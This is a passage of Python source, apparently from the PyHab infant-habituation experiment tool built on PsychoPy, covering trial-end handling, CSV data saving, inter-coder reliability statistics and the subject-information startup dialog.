'duration':offDur2}\n offArray2.append(tempGazeArray2)\n elif gazeOn2 and not self.keyboard[self.secondKey]: # if they were looking and have looked away.\n gazeOn2 = False\n endOn2 = core.getTime() - startTrial2\n onDur2 = endOn2 - startOn2\n numOff2 = numOff2 + 1\n startOff2 = core.getTime() - startTrial2\n tempGazeArray2 = {'trial':number, 'trialType':dataType, 'startTime':startOn2, 'endTime':endOn2, 'duration':onDur2}\n onArray2.append(tempGazeArray2)\n sumOn2 = sumOn2 + onDur2\n movieStatus = self.dispTrial(localType, disMovie)\n if localType in self.movieEnd and endFlag and movieStatus >= 1:\n runTrial = False\n endTrial = core.getTime() - startTrial\n if gazeOn:\n onDur = endTrial - startOn\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOn, 'endTime':endTrial, 'duration':onDur}\n onArray.append(tempGazeArray)\n else:\n offDur = endTrial - startOff\n tempGazeArray = {'trial':number, 'trialType':dataType, 'startTime':startOff, 'endTime':endTrial, 'duration':offDur}\n offArray.append(tempGazeArray)\n if gazeOn2:\n onDur2 = endTrial - startOn2\n tempGazeArray2 = {'trial':number, 'trialType':dataType, 'startTime':startOn2, 'endTime':endTrial, 'duration':onDur2}\n onArray2.append(tempGazeArray2)\n else:\n offDur2 = endTrial - startOff2\n tempGazeArray2 = {'trial':number, 'trialType':dataType, 'startTime':startOff2, 'endTime':endTrial, 'duration':offDur2}\n offArray2.append(tempGazeArray2)\n # print offArray\n # print onArray2\n # print offArray2\n if habTrial:\n habDataRec = self.habCount + 1\n else:\n habDataRec = 0\n if self.stimPres:\n # Reset everything, stop playing sounds and movies.\n if disMovie['stimType'] == 'Movie':\n disMovie['stim'].seek(0.0)\n disMovie['stim'].pause()\n elif disMovie['stimType'] == 'Audio':\n disMovie['stim'].stop()\n elif disMovie['stimType'] == 'Image with audio':\n disMovie['stim']['Audio'].stop()\n if self.stimPres and number < len(self.actualTrialOrder):\n tmpNxt = deepcopy(self.actualTrialOrder[number])\n while '.' in tmpNxt:\n tmpNxt = tmpNxt[tmpNxt.index('.')+1:]\n if tmpNxt not in self.autoAdvance:\n self.dummyThing.draw()\n self.win.flip() # blanks the screen outright between trials if NOT auto-advancing into the next trial\n if abort: # if the abort button was pressed\n if self.stimPres and disMovie['stimType'] == 'Movie':\n disMovie['stim'].seek(0.0)\n disMovie['stim'].pause()\n self.abortTrial(onArray, offArray, number, dataType, onArray2, offArray2, self.stimName, habDataRec)\n return 3\n else:\n self.dataRec(onArray, offArray, number, dataType, onArray2, offArray2, self.stimName, habDataRec)\n if self.habMetWhen == -1 and len(self.habTrialList) > 0 and not abort: # if still during habituation\n if dataType[0:4] == 'hab.' and dataType[4:] in self.calcHabOver:\n tempSum = 0\n for c in range(0, len(onArray)):\n tempSum += onArray[c]['duration']\n self.habDataCompiled[self.habCount] += tempSum\n if '^' in ttype:\n self.habCount += 1 # Note: Occurs after data recording, making recording hab trial number hard.\n # Check if criteria need to be set or have been met\n if self.checkStop(): # If criteria met\n # Check if there are any trials FOLLOWING the hab trials.\n if self.maxHabIndex < len(self.actualTrialOrder)-1:\n return 1\n else:\n return 2 # End experiment.\n else:\n return 0\n else:\n return 0\n elif ttype == 'Hab' and self.habMetWhen == -1 and not abort:\n tempSum = 0\n for c in range(0, len(onArray)):\n tempSum += onArray[c]['duration']\n self.habDataCompiled[self.habCount] += tempSum\n self.habCount += 1\n if self.checkStop(): # If criteria met\n # Check if there are any trials FOLLOWING the hab trials.\n if self.actualTrialOrder[-1] != 'Hab':\n return 1\n else:\n return 2 # End experiment.\n else:\n return 0\n elif number >= len(self.actualTrialOrder) or ttype == 4:\n # End experiment\n return 2\n else:\n #Proceed as normal\n return 0\n\n def endExperiment(self):\n \"\"\"\n End experiment, save all data, calculate reliability if needed, close up shop. Displays \"saving data\" and\n end-of-experiment screen.\n\n :return:\n :rtype:\n \"\"\"\n tempText = visual.TextStim(self.win2, text=\"Saving data...\", pos=[0, 0], color='white', bold=True, height=40)\n tempText.draw()\n self.win2.flip()\n if self.stimPres:\n self.dummyThing.draw()\n if self.endImageObject is not None:\n self.endImageObject.draw()\n self.win.flip()\n\n # Block-level summary data. Omits bad trials.\n if len(self.blockDataList)>0:\n tempMatrix = self.saveBlockFile()\n # Now write the actual data file\n nDupe = '' # This infrastructure eliminates the risk of overwriting existing data\n o = 1\n blockfilename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(\n self.sID) + nDupe + '_BlockSumm_' + str(\n self.today.month) + str(self.today.day) + str(self.today.year) + '.csv'\n while os.path.exists(blockfilename):\n o += 1\n nDupe = str(o)\n blockfilename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(\n self.sID) + nDupe + '_BlockSumm_' + str(\n self.today.month) + str(self.today.day) + str(self.today.year) + '.csv'\n with open(blockfilename, 'w') as b:\n blockWriter = csv.DictWriter(b, fieldnames=self.dataColumns, extrasaction='ignore', lineterminator='\\n')\n blockWriter.writeheader()\n for z in range(0, len(tempMatrix)):\n blockWriter.writerow(tempMatrix[z])\n\n # If there is habituation data, create hab summary file. Similar to the block one, but a little easier thanks to\n # the tagging of habituation trial numbers.\n if self.habSetWhen > 0 and len(self.habTrialList) > 0: # If there's a 'Hab' trial type, the main summary file does the trick just fine.\n habMatrix = self.saveHabFile()\n # Now, actually write the file\n nDupe = '' # This infrastructure eliminates the risk of overwriting existing data\n o = 1\n habfilename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(\n self.sID) + nDupe + '_HabSumm_' + str(\n self.today.month) + str(self.today.day) + str(self.today.year) + '.csv'\n while os.path.exists(habfilename):\n o += 1\n nDupe = str(o)\n habfilename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(\n self.sID) + nDupe + '_HabSumm_' + str(\n self.today.month) + str(self.today.day) + str(self.today.year) + '.csv'\n with open(habfilename, 'w') as h:\n habWriter = csv.DictWriter(h, fieldnames=self.dataColumns, extrasaction='ignore', lineterminator='\\n')\n habWriter.writeheader()\n for z in range(0, len(habMatrix)):\n habWriter.writerow(habMatrix[z])\n\n # Shuffle together bad data and good data into the appropriate order.\n if len(self.badTrials) > 0: # if there are any redos, they need to be shuffled in appropriately.\n for i in range(0, len(self.badTrials)):\n x = 0\n while x < len(self.dataMatrix) and self.dataMatrix[x]['trial'] != self.badTrials[i]['trial']:\n x += 1\n while x < len(self.dataMatrix) and self.dataMatrix[x]['GNG'] == 0: # this is to get around the possibility that the same trial had multiple 'false starts'\n x += 1\n self.dataMatrix.insert(x, self.badTrials[i]) # python makes this stupid easy\n nDupe = '' # This infrastructure eliminates the risk of overwriting existing data\n o = 1\n filename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(self.sID) + nDupe + '_' + str(self.today.month) + str(\n self.today.day) + str(self.today.year) + '.csv'\n while os.path.exists(filename):\n o += 1\n nDupe = str(o)\n filename = self.dataFolder + self.prefix + str(self.sNum) + '_' + str(self.sID) + nDupe + '_' + str(\n self.today.month) + str(\n self.today.day) + str(self.today.year) + '.csv'\n with open(filename, 'w') as f:\n outputWriter = csv.DictWriter(f, fieldnames=self.dataColumns, extrasaction='ignore', lineterminator='\\n')\n outputWriter.writeheader()\n for r in range(0, len(self.dataMatrix)):\n # print('writing rows')\n outputWriter.writerow(self.dataMatrix[r])\n\n\n #Verbose data saving.\n verboseMatrix = []\n # first, verbose data is not as well organized. However, we should be able to alternate back and forth between\n # on and off until we reach the end of a given trial, to reconstruct it.\n # at the start of each line, add information: sNum, ageMo, ageDay, sex, cond, GNG, ON/OFF\n for n in range(0, len(self.verbDatList['verboseOn'])):\n self.verbDatList['verboseOn'][n].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':1, 'gazeOnOff':1})\n for m in range(0, len(self.verbDatList['verboseOff'])): # adding the details to the verbose array\n self.verbDatList['verboseOff'][m].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':1, 'gazeOnOff':0})\n if len(self.badTrials) > 0:\n for o in range(0, len(self.verbBadList['verboseOn'])):\n self.verbBadList['verboseOn'][o].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':0, 'gazeOnOff':1})\n for p in range(0, len(self.verbBadList['verboseOff'])): # same details for the bad trials\n self.verbBadList['verboseOff'][p].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':0, 'gazeOnOff':0})\n # read the final data matrix and go trial by trial.\n # print(verboseOn) #debug, to make sure verboseOn is being constructed correctly\n for q in range(0, len(self.dataMatrix)):\n tnum = self.dataMatrix[q]['trial']\n onIndex = -1\n offIndex = -1\n if self.dataMatrix[q]['GNG'] == 1: # separate for good and bad trials\n for x in range(0, len(self.verbDatList['verboseOn'])):\n if self.verbDatList['verboseOn'][x]['trial'] == tnum and onIndex == -1: # find the right index in the verbose matrices\n onIndex = x\n for y in range(0, len(self.verbDatList['verboseOff'])):\n if self.verbDatList['verboseOff'][y]['trial'] == tnum and offIndex == -1:\n offIndex = y\n trialVerbose = []\n if onIndex >= 0:\n while onIndex < len(self.verbDatList['verboseOn']):\n if self.verbDatList['verboseOn'][onIndex]['trial'] == tnum:\n trialVerbose.append(self.verbDatList['verboseOn'][onIndex])\n onIndex += 1\n if offIndex >= 0:\n while offIndex < len(self.verbDatList['verboseOff']):\n if self.verbDatList['verboseOff'][offIndex]['trial'] == tnum:\n trialVerbose.append(self.verbDatList['verboseOff'][offIndex])\n offIndex += 1\n trialVerbose2 = sorted(trialVerbose, key=lambda trialVerbose: trialVerbose['startTime']) #Sorts by \"startTime\" of each gaze event\n verboseMatrix.extend(trialVerbose2)\n elif self.dataMatrix[q]['GNG'] == 0: # bad trials.\n if q > 0 and self.dataMatrix[q - 1]['GNG'] == 0:\n pass # stops it from doubling up. If there is more than one consecutive bad trial, it will get all of them in a row the first time,\n else:\n trialVerbose = []\n for x in range(0, len(self.verbBadList['verboseOn'])):\n if self.verbBadList['verboseOn'][x]['trial'] == tnum and onIndex == -1:\n onIndex = x\n for y in range(0, len(self.verbBadList['verboseOff'])):\n if self.verbBadList['verboseOff'][y]['trial'] == tnum and offIndex == -1:\n offIndex = y\n if onIndex >= 0:\n while onIndex < len(self.verbBadList['verboseOn']):\n if self.verbBadList['verboseOn'][onIndex]['trial'] == tnum:\n trialVerbose.append(self.verbBadList['verboseOn'][onIndex])\n onIndex += 1\n if offIndex >= 0:\n while offIndex < len(self.verbBadList['verboseOff']):\n if self.verbBadList['verboseOff'][offIndex]['trial'] == tnum:\n trialVerbose.append(self.verbBadList['verboseOff'][offIndex])\n offIndex += 1\n trialVerbose2 = sorted(trialVerbose, key=lambda trialVerbose: trialVerbose['startTime']) # this is the magic bullet, in theory.\n verboseMatrix.extend(trialVerbose2)\n headers2 = ['snum', 'months', 'days', 'sex', 'cond', 'GNG', 'gazeOnOff', 'trial', 'trialType', 'startTime', 'endTime', 'duration']\n with open(self.verboseFolder + self.prefix + str(self.sNum) + '_' + str(self.sID) + nDupe + '_' + str(self.today.month) + str(self.today.day) + str(self.today.year) + '_VERBOSE.csv', 'w') as f:\n outputWriter2 = csv.DictWriter(f, fieldnames=headers2, extrasaction='ignore', lineterminator='\\n')\n outputWriter2.writeheader()\n for z in range(0, len(verboseMatrix)):\n outputWriter2.writerow(verboseMatrix[z])\n if len(self.verbDatList['verboseOn2']) > 0: # If there is even a single gaze-on event from coder B, save coder B data.\n verboseMatrix2 = []\n for n in range(0, len(self.verbDatList['verboseOn2'])):\n self.verbDatList['verboseOn2'][n].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':1, 'gazeOnOff':1})\n for m in range(0, len(self.verbDatList['verboseOff2'])):\n self.verbDatList['verboseOff2'][m].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':1, 'gazeOnOff':0})\n if len(self.badTrials) > 0:\n for o in range(0, len(self.verbBadList['verboseOn2'])):\n self.verbBadList['verboseOn2'][o].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':0, 'gazeOnOff':1})\n for p in range(0, len(self.verbBadList['verboseOff2'])):\n self.verbBadList['verboseOff2'][p].update({'snum':self.sNum, 'months':self.ageMo, 'days':self.ageDay, 'sex':self.sex,\n 'cond':self.cond, 'GNG':0, 'gazeOnOff':0})\n for q in range(0, len(self.dataMatrix)):\n tnum = self.dataMatrix[q]['trial']\n onIndex2 = -1\n offIndex2 = -1\n if self.dataMatrix[q]['GNG'] == 1: # separate for good and bad trials\n for x in range(0, len(self.verbDatList['verboseOn2'])):\n if self.verbDatList['verboseOn2'][x]['trial'] == tnum and onIndex2 == -1: # find the right index in the verbose matrices\n onIndex2 = x\n for y in range(0, len(self.verbDatList['verboseOff2'])):\n if self.verbDatList['verboseOff2'][y]['trial'] == tnum and offIndex2 == -1:\n offIndex2 = y\n trialVerbose = []\n if onIndex2 >= 0:\n while onIndex2 < len(self.verbDatList['verboseOn2']):\n if self.verbDatList['verboseOn2'][onIndex2]['trial'] == tnum:\n trialVerbose.append(self.verbDatList['verboseOn2'][onIndex2])\n onIndex2 += 1\n if offIndex2 >= 0:\n while offIndex2 < len(self.verbDatList['verboseOff2']):\n if self.verbDatList['verboseOff2'][offIndex2]['trial'] == tnum:\n trialVerbose.append(self.verbDatList['verboseOff2'][offIndex2])\n offIndex2 += 1\n trialVerbose2 = sorted(trialVerbose, key=lambda trialVerbose: trialVerbose['startTime'])\n verboseMatrix2.extend(trialVerbose2)\n elif self.dataMatrix[q]['GNG'] == 0: # bad trials. These arrays will be much less predictable, so putting them together is inherently more challenging\n if q > 0 and self.dataMatrix[q - 1]['GNG'] == 0:\n pass # stops it from doubling up. If there is more than one consecutive bad trial, it will get all of them in a row the first time,\n else:\n for x in range(0, len(self.verbBadList['verboseOn2'])):\n if self.verbBadList['verboseOn2'][x]['trial'] == tnum and onIndex2 == -1:\n onIndex2 = x\n for y in range(0, len(self.verbBadList['verboseOff2'])):\n if self.verbBadList['verboseOff2'][y]['trial'] == tnum and offIndex2 == -1:\n offIndex2 = y\n trialVerbose = []\n if onIndex2 >= 0:\n while onIndex2 < len(self.verbBadList['verboseOn2']):\n if self.verbBadList['verboseOn2'][onIndex2]['trial'] == tnum:\n trialVerbose.append(self.verbBadList['verboseOn2'][onIndex2])\n onIndex2 += 1\n if offIndex2 >= 0:\n while offIndex2 < len(self.verbBadList['verboseOff2']):\n if self.verbBadList['verboseOff2'][offIndex2]['trial'] == tnum:\n trialVerbose.append(self.verbBadList['verboseOff2'][offIndex2])\n offIndex2 += 1\n trialVerbose2 = sorted(trialVerbose, key=lambda trialVerbose: trialVerbose['startTime'])\n verboseMatrix2.extend(trialVerbose2)\n with open(self.verboseFolder + self.prefix + str(self.sNum) + '_' + str(self.sID) + nDupe + '_' + str(self.today.month) + str(self.today.day) + str(self.today.year) + '_VERBOSEb.csv', 'w') as f:\n outputWriter3 = csv.DictWriter(f, fieldnames=headers2, extrasaction='ignore', lineterminator='\\n')\n outputWriter3.writeheader()\n for k in range(0, len(verboseMatrix2)):\n outputWriter3.writerow(verboseMatrix2[k])\n rel = self.reliability(verboseMatrix, verboseMatrix2)\n headers3 = ['WeightedPercentageAgreement', 'CohensKappa', 'AverageObserverAgreement', 'PearsonsR']\n with open(self.dataFolder + self.prefix + str(self.sNum) + '_' + str(self.sID) + nDupe + '_' + str(self.today.month) + str(self.today.day) + str(self.today.year) + '_Stats.csv', 'w') as f:\n outputWriter4 = csv.DictWriter(f, fieldnames=headers3, extrasaction='ignore', lineterminator='\\n')\n outputWriter4.writeheader()\n outputWriter4.writerow(rel)\n # core.wait(.3) Replaced by end-of-experiment screen\n # \"end of experiment\" screen. By default this will go to a black screen on the stim view\n # and display \"Experiment finished!\" on the experimenter view\n tempText.text = \"Experiment finished! Press return to close.\"\n tempText.height = 18\n tempText.draw()\n self.win2.flip()\n if self.stimPres:\n self.dummyThing.draw()\n if self.endImageObject is not None:\n self.endImageObject.draw()\n self.win.flip()\n event.waitKeys(keyList='return')\n\n self.win2.close()\n if self.stimPres:\n self.win.close()\n\n def saveBlockFile(self):\n \"\"\"\n A function that create a block-level summary file and saves it. Copies the primary data matrix (only good trials)\n and loops over it, compressing all blocks. Does not work for habs, which follow their own rules.\n\n :return: A condensed copy of dataMatrix with all blocks of the relevant types condensed to one line.\n :rtype: list\n \"\"\"\n tempMatrix = deepcopy(self.dataMatrix)\n tempIndex = 0\n blockDone = False\n lastTrialNumber = tempMatrix[-1]['trial']\n # Making this generalizeable for preferential looking studies.\n if 'sumOnL' in self.dataMatrix[0].keys():\n sumFields = ['sumOnL','numOnL','sumOnR', 'numOnR', 'sumOff', 'numOff']\n else:\n sumFields = ['sumOnA', 'numOnA', 'sumOffA', 'numOffA', 'sumOnB', 'numOnB', 'sumOffB', 'numOffB']\n while not blockDone:\n nt = tempMatrix[tempIndex]['trial']\n for i, j in self.blockDataTags.items():\n for k in range(0, len(j)):\n if nt in j[k]:\n tempType = tempMatrix[tempIndex]['trialType']\n if tempType[0:tempType.index('.')] == i:\n tempMatrix[tempIndex]['trialType'] = i # Rename the type line for the block as a whole.\n else: # If it's nested, maintain the prefixes.\n nestType = deepcopy(tempType)\n prefix = ''\n while nestType[0:nestType.index('.')] != i:\n prefix = prefix+nestType[0:nestType.index('.')]+'.'\n nestType = nestType[nestType.index('.')+1:]\n tempMatrix[tempIndex]['trialType'] = prefix+i # Rename the type line for the block as a whole.\n for l in range(1, len(j[k])): # Taking advantage of continguity of blocks.\n if j[k][l] <= lastTrialNumber: # For studies that end early.\n # Fields to modify: sum and num on/off a/b, append stimnames.\n tempLine = tempMatrix.pop(tempIndex + 1) # Because we'll be sequentially popping them off, it'll always be the next one\n tempMatrix[tempIndex]['stimName'] = tempMatrix[tempIndex]['stimName'] + '+' + tempLine['stimName']\n for z in range(0, len(sumFields)):\n tempMatrix[tempIndex][sumFields[z]] = tempMatrix[tempIndex][sumFields[z]] + tempLine[sumFields[z]]\n tempIndex += 1\n if tempIndex >= len(tempMatrix):\n blockDone = True\n for i in range(0, len(tempMatrix)):\n tempMatrix[i]['trial'] = i+1\n return tempMatrix\n\n def saveHabFile(self):\n \"\"\"\n Creates a habituation summary data file, which has one line per hab trial, and only looks at parts of the hab\n trial that were included in calcHabOver. This is notably easier in some ways because the hab trials are already\n tagged in dataMatrix\n\n :return: A condensed copy of dataMatrix with all hab trials condensed only to those that were used to compute habituation.\n :rtype: list\n \"\"\"\n habMatrix = []\n # Making this generalizeable for preferential looking studies.\n if 'sumOnL' in self.dataMatrix[0].keys():\n sumFields = ['sumOnL', 'numOnL', 'sumOnR', 'numOnR', 'sumOff', 'numOff']\n else:\n sumFields = ['sumOnA', 'numOnA', 'sumOffA', 'numOffA', 'sumOnB', 'numOnB', 'sumOffB', 'numOffB']\n for i in range(0, len(self.dataMatrix)):\n if isinstance(self.dataMatrix[i]['habTrialNo'], int):\n tempType = deepcopy(self.dataMatrix[i]['trialType'])\n tempType = tempType[4:] # to remove 'hab.'\n if tempType in self.calcHabOver: # If not, this should specifically be ignored.\n tempNo = self.dataMatrix[i]['habTrialNo']\n addTo = False\n addIndex = -1\n tempLine = deepcopy(self.dataMatrix[i])\n tempLine['trialType'] = 'Hab'\n for j in range(0, len(habMatrix)):\n if habMatrix[j]['habTrialNo'] == tempNo:\n addTo = True\n addIndex = deepcopy(j)\n if addTo:\n habMatrix[addIndex]['stimName'] = habMatrix[addIndex]['stimName'] + '+' + tempLine['stimName']\n for z in range(0, len(sumFields)):\n habMatrix[addIndex][sumFields[z]] = habMatrix[addIndex][sumFields[z]] + tempLine[sumFields[z]]\n else:\n habMatrix.append(tempLine)\n else:\n pass\n else: # For all non-habituation trials.\n habMatrix.append(deepcopy(self.dataMatrix[i]))\n for i in range(0, len(habMatrix)):\n habMatrix[i]['trial'] = i+1\n return habMatrix\n\n def wPA(self, timewarp, timewarp2):\n \"\"\"\n Calculates weighted percentage agreement, computed as number of agreement frames over total frames.\n\n :param timewarp: List of every individual frame's gaze-on/gaze-off code for coder A\n :type timewarp: list\n :param timewarp2: As above for coder B\n :type timewarp2: list\n :return: Weighted Percentage Agreement\n :rtype: float\n \"\"\"\n a = 0\n d = 0\n for (i, j) in zip(timewarp, timewarp2):\n if i[0] == j[0]:\n if i[1] == j[1]:\n a += 1\n else:\n d += 1\n else:\n d += 1\n wpagreement = float(a) / float(a + d)\n return wpagreement\n\n def pearsonR(self, verboseMatrix, verboseMatrix2):\n \"\"\"\n Computes Pearson's R\n\n :param verboseMatrix: Verbose data, coder A\n :type verboseMatrix: dict\n :param verboseMatrix2: Verboase data, coder B\n :type verboseMatrix2: dict\n :return: Pearson's R\n :rtype: float\n \"\"\"\n trialA = []\n trialB = []\n avA = 0\n avB = 0\n # loop to construct trial array, zeroed out.\n for k in range(0, verboseMatrix[-1]['trial']):\n trialA.append(0)\n trialB.append(0)\n # separate loops for computing total on time per trial for each coder, must be done separately from verbose data files\n # b/c no longer access to summary data\n for i in verboseMatrix:\n if i['GNG'] != 0: # Good trials only\n if i['gazeOnOff'] != 0: # We only care about total on-time.\n tn = i['trial'] - 1\n trialA[tn] += i['duration'] # add the looking time to the appropriate trial index.\n for i in verboseMatrix2:\n if i['GNG'] != 0: # Good trials only\n if i['gazeOnOff'] != 0: # We only care about total on-time.\n tn = i['trial'] - 1\n trialB[tn] += i['duration'] # add the looking time to the appropriate trial index.\n for j in range(0, len(trialA)):\n avA += trialA[j]\n avB += trialB[j]\n avA = avA / verboseMatrix[-1]['trial'] # final trial number.\n avB = avB / verboseMatrix2[-1]['trial'] # in point of fact should be the same last trial # but eh.\n xy = []\n for i in range(0, len(trialA)):\n trialA[i] -= avA\n trialB[i] -= avB\n xy.append(trialA[i] * trialB[i])\n for i in range(0, len(trialA)): # square the deviation arrays\n trialA[i] = trialA[i] ** 2\n trialB[i] = trialB[i] ** 2\n r = float(sum(xy) / sqrt(sum(trialA) * sum(trialB)))\n return r\n\n def cohensKappa(self, timewarp, timewarp2):\n \"\"\"\n Computes Cohen's Kappa\n\n :param timewarp: List of every individual frame's gaze-on/gaze-off code for coder A\n :type timewarp: list\n :param timewarp2: As above for coder B\n :type timewarp2: list\n :return: Kappa\n :rtype: float\n \"\"\"\n wpa = self.wPA(timewarp, timewarp2)\n coderBon = 0\n coderAon = 0\n for i in range(0, len(timewarp)): # are the 2 timewarps equal? - when can one be bigger?\n if timewarp[i][1] == 1:\n coderAon += 1\n if timewarp2[i][1] == 1:\n coderBon += 1\n pe = (float(coderAon) / len(timewarp)) * (float(coderBon) / len(timewarp2)) + (\n float(len(timewarp) - coderAon) / len(timewarp)) * (\n float(len(timewarp2) - coderBon) / len(timewarp2))\n k = float(wpa - pe) / float(1 - pe)\n return k\n\n def avgObsAgree(self, timewarp, timewarp2):\n \"\"\"\n Computes average observer agreement as agreement in each trial, divided by number of trials.\n\n :param timewarp: List of every individual frame's gaze-on/gaze-off code for coder A\n :type timewarp: list\n :param timewarp2: As above for coder B\n :type timewarp2: list\n :return: average observer agreement or N/A if no valid data\n :rtype: float\n \"\"\"\n\n finalTrial = timewarp[-1][0] # 0 is trial number.\n\n tg = 0\n if finalTrial > 0: # if there are NO good trials, well it's probably crashed already, but JIC\n for i in range(0, finalTrial): # need contingency if last trial is bad trial?\n a = 0\n d = 0\n for (m, l) in zip(timewarp, timewarp2):\n if m[0] == i + 1 and l[0] == i + 1:\n if m[1] == l[1]:\n a += 1\n else:\n d += 1\n tg = tg + float(a) / (a + d)\n aoagreement = float(tg) / finalTrial\n return aoagreement\n else:\n return 'N/A'\n\n def reliability(self, verboseMatrix, verboseMatrix2):\n \"\"\"\n Calculates reliability statistics. Constructed originally by Florin Gheorgiu for PyHab,\n modified by Jonathan Kominsky.\n\n\n :param verboseMatrix: A 2-dimensional list with the content of the verbose data file for coder 1\n :type verboseMatrix: list\n :param verboseMatrix2: A 2-dimensional list with the content of the verbose data file for coder 2\n :type verboseMatrix2: list\n :return: A dict of four stats in float form (weighted % agreement, average observer agreement, Cohen's Kappa, and Pearson's R)\n :rtype: dict\n \"\"\"\n\n timewarp = [] # frame by frame arrays\n timewarp2 = []\n\n for i in verboseMatrix:\n if i['GNG'] != 0: # check for it not to be a bad gaze\n for k in range(0, int(round(i['duration'] * 60))):\n timewarp.append([i['trial'], i['gazeOnOff']]) # 6 being On or Off and 7 the trial no.\n for i in verboseMatrix2:\n if i['GNG'] != 0:\n for k in range(0, int(round(i['duration'] * 60))):\n timewarp2.append([i['trial'], i['gazeOnOff']])\n if len(timewarp) > len(timewarp2): # making sure the frame by frame arrays are of equal length\n diff = len(timewarp) - len(timewarp2)\n for s in range(0, diff):\n timewarp2.append([verboseMatrix2[-1]['trial'], 0])\n elif len(timewarp) < len(timewarp2):\n diff = len(timewarp2) - len(timewarp)\n for s in range(0, diff):\n timewarp.append([verboseMatrix[-1]['trial'], 0])\n\n stats = {'WeightedPercentageAgreement': self.wPA(timewarp, timewarp2),\n 'CohensKappa': self.cohensKappa(timewarp, timewarp2),\n 'AverageObserverAgreement': self.avgObsAgree(timewarp, timewarp2),\n 'PearsonsR': self.pearsonR(verboseMatrix, verboseMatrix2)}\n return stats\n\n def isInt(t):\n \"\"\"\n silly little function for validating a very narrow usage of \"cond\" field\n\n :return: Bool: if arbitrary argument t is an int, true.\n :rtype:\n \"\"\"\n try:\n int(t)\n return True\n except ValueError:\n return False\n\n def run(self, testMode = []):\n \"\"\"\n Startup function. Presents subject information dialog to researcher, reads and follows settings and condition\n files. Now with a testing mode to allow us to skip the dialog and ensure the actualTrialOrder structure is being\n put together properly in unit testing.\n\n Also expands habituation blocks appropriately and tags trials with habituation iteration number as well as\n the symbol for the end of a hab block (^)\n\n :param testMode: Optional and primarily only used for unit testing. Will not launch the window and start the experiment. Contains all the info that would appear in the subject info dialog.\n :type testMode: list\n :return:\n :rtype:\n \"\"\"\n if len(testMode) > 0: # This is for testing purposes, to make sure we can automatically test most of the features of PyHab\n import mock\n startDlg = mock.MagicMock()\n startDlg.data = testMode\n startDlg.OK = True\n else:\n startDlg = gui.Dlg(title=self.prefix + ' Experiment')\n startDlg.addText('Subject info')\n startDlg.addField('Subject Number: ')\n startDlg.addField('Subject ID: ')\n startDlg.addField('sex: ')\n startDlg.addField('DOB(month): ')\n startDlg.addField('DOB(day): ')\n startDlg.addField('DOB(year): ')\n if self.randPres and len(self.condList) > 0:\n startDlg.addField('Cond: ', choices=self.condList)\n else:\n startDlg.addField('Cond: ')\n if not self.stimPres:\n startDlg.addText(\"Date of test (leave blank for today)\")\n startDlg.addField('DOT(month): ')\n startDlg.addField('DOT(day): ')\n startDlg.addField('DOT(year): ')\n startDlg.show()\n if startDlg.OK:\n fail = False # A bool for detecting if we have to start over at any point.\n thisInfo = startDlg.data\n self.sNum = thisInfo[0]\n self.sID = thisInfo[1]\n self.sex = thisInfo[2]\n # now for the exciting bit: converting DOB into months/days.\n self.today = date.today()\n # First, check valid entries\n try:\n for i in range(3,6):\n irrel = int(thisInfo[i])\n except:\n fail = True\n if not fail:\n # then, check if 4-digit or 2-digit year.\n if len(thisInfo[5]) > 2:\n year = int(thisInfo[5])\n else:\n year = 2000 + int(thisInfo[5])\n DOB = date(year, int(thisInfo[3]), int(thisInfo[4]))\n if self.stimPres:\n DOT = self.today\n elif len(thisInfo[9]) == 0 or len(thisInfo[8]) == 0 or len(thisInfo[7]) == 0:\n DOT = self.today\n else:\n try:\n if len(thisInfo[9]) > 2:\n year = int(thisInfo[9])\n else:\n year = 2000 + int(thisInfo[9])\n DOT = date(year, int(thisInfo[7]), int(thisInfo[8]))\n except:\n DOT = self.today\n warnDlg = gui.Dlg(\"Warning! Invalid date!\")\n warnDlg.addText(\"DOT is invalid. Defaulting to today's date.\")\n irrel = warnDlg.show()\n # Dateutil's relativedelta is included in psychopy and just better than every other option!\n ageDif = relativedelta(DOT, DOB)\n self.ageMo = ageDif.years * 12 + ageDif.months\n self.ageDay = ageDif.days # Impossibly simple, but it works.\n # build stimulus order\n if self.randPres and len(self.condList) > 0: # Extra check: We WANT conditions and we HAVE them too.\n self.condLabel = thisInfo[6]\n testReader = csv.reader(open(self.condPath + self.condFile, 'rU'))\n testStuff = []\n for row in testReader:\n testStuff.append(row)\n testDict = dict(testStuff)\n self.cond = testDict[self.condLabel] # this will read as order of movies in N groups, in a 2-dimensional array\n # type conversion required. Eval will read the string into a dictionary (now).\n self.cond = eval(self.cond)\n # now to rearrange the lists of each trial type.\n finalDict = {}\n finalBlock = {}\n for i, j in self.cond.items():\n newTempTrials = []\n for q in range(0, len(j)):\n if type(j[q]) is int: # Dealing with old versions.\n newTempTrials.append(self.stimNames[i][j[q] - 1])\n #print(\"Converting old conditions...\")\n\n else:\n newTempTrials.append(j[q])\n if i in self.blockList.keys():\n finalBlock[i] = newTempTrials\n finalDict[i] = newTempTrials\n self.stimNames = finalDict\n self.blockList = finalBlock\n if 'Hab' in self.blockList.keys():\n self.habTrialList = self.blockList['Hab']\n else:\n self.cond = thisInfo[6]\n self.condLabel = self.cond\n # Set actual order of trials\n self.actualTrialOrder = [] # in this version, mostly a key for the hab trials and blocks.\n for i in range(0, len(self.trialOrder)):\n if self.trialOrder[i] == 'Hab':\n for j in range(0, self.maxHabTrials):\n if len(self.habTrialList) > 0:\n self.blockExpander(self.habTrialList, 'hab', hab=True, habNum=j + 1)\n else:\n self.actualTrialOrder.append('Hab')\n self.maxHabIndex = 